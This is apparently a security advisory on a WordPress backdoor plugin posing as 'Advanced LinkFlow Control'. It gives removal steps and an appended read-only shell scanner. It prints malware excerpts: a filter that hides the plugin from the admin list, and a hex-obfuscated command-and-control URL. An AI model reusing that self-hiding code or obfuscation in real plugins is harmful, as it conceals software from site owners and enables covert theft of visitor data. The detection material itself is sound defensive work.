Advanced LinkFlow Control v1.2.5
/advanced-linkflow-control/
Quick Answer
If you discovered the "Advanced LinkFlow Control" plugin in your WordPress files, your site is infected with a stealth backdoor. This malware hides itself from the admin dashboard, clears cache plugins to persist, and secretly exfiltrates visitor data to a remote server. You must delete the advanced-linkflow-control folder immediately.
Threat Behavior & Purpose
The malware disguises itself as a utility plugin, hides itself from the WordPress admin plugin list, and acts as a backdoor that exfiltrates visitor data (IP addresses, User-Agents). It also clears caching plugins so that injected SEO spam persists, and it cloaks content from search engines.
Main File
advanced-linkflow-control.php
Fake Author
Full Installation Path
wp-content/plugins/advanced-linkflow-control/advanced-linkflow-control.php
Malware Family
SEO Spam
Malicious Code Signature
If you find the following code signature in your files, your site is compromised:
```php
// Removes this plugin's own entry from the admin plugin list,
// unless the request carries an "sp" query parameter.
add_filter('all_plugins', function ($plugins) {
    if (isset($_GET['sp'])) {
        return $plugins;
    }
    $current = plugin_basename(__FILE__);
    unset($plugins[$current]);
    return $plugins;
});

// Decoded C2 Server
private $server_url = "\x68\x74\x74\x70:\x2f/\x77h\x74a\x73f\x64e\x2ei\x63u\x2fg\x65t\x2ep\x68p"; // http://whtasfde.icu/get.php
```
Removal Protocol
- Access your server’s file system via FTP or File Manager.
- Navigate to `wp-content/plugins/`.
- Locate and completely delete the `advanced-linkflow-control` folder to eliminate the backdoor.
- Verify the removal: confirm that no related active processes remain, and check your `wp_options` table for any leftover transients.
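
A read-only check for the indicators described on this page, as an added example (not code from the original page): it flags the named folder and, more generally, any plugin PHP file that hooks `all_plugins` and unsets an entry, or that contains a string starting with hex-escaped "http". It assumes shell access to the server; the function name, the output labels and the WordPress root passed as the argument are hypothetical.

```shell
#!/bin/sh
# Added example: scan a WordPress install for self-hiding plugins.
# Exit status: 0 = indicators found, 1 = none found, 2 = no plugins directory.
scan_hidden_plugins() {
    plugins_dir="$1/wp-content/plugins"
    if [ ! -d "$plugins_dir" ]; then
        echo "no plugins directory under $1" >&2
        return 2
    fi
    hits=$(
        # Indicator 1: the folder name given on this page.
        if [ -d "$plugins_dir/advanced-linkflow-control" ]; then
            echo "FOLDER    $plugins_dir/advanced-linkflow-control"
        fi
        find "$plugins_dir" -type f -name '*.php' | while IFS= read -r f; do
            # Indicator 2: hooks the all_plugins filter and unsets an entry,
            # which is how the plugin removes itself from the admin list.
            if grep -Eq "add_filter\([[:space:]]*['\"]all_plugins['\"]" "$f" &&
               grep -Eq 'unset\([[:space:]]*\$plugins\[' "$f"; then
                echo "SELF-HIDE $f"
            fi
            # Indicator 3: a literal that spells "http" in \x escapes,
            # as the obfuscated server URL in the signature does.
            if grep -Fq '\x68\x74\x74\x70' "$f"; then
                echo "HEX-URL   $f"
            fi
        done
    )
    [ -n "$hits" ] || return 1
    printf '%s\n' "$hits"
}
```

Run it as `scan_hidden_plugins /path/to/wordpress` before and after deleting the folder; a `SELF-HIDE` or `HEX-URL` hit in a different plugin directory deserves manual review, since legitimate plugins rarely do either.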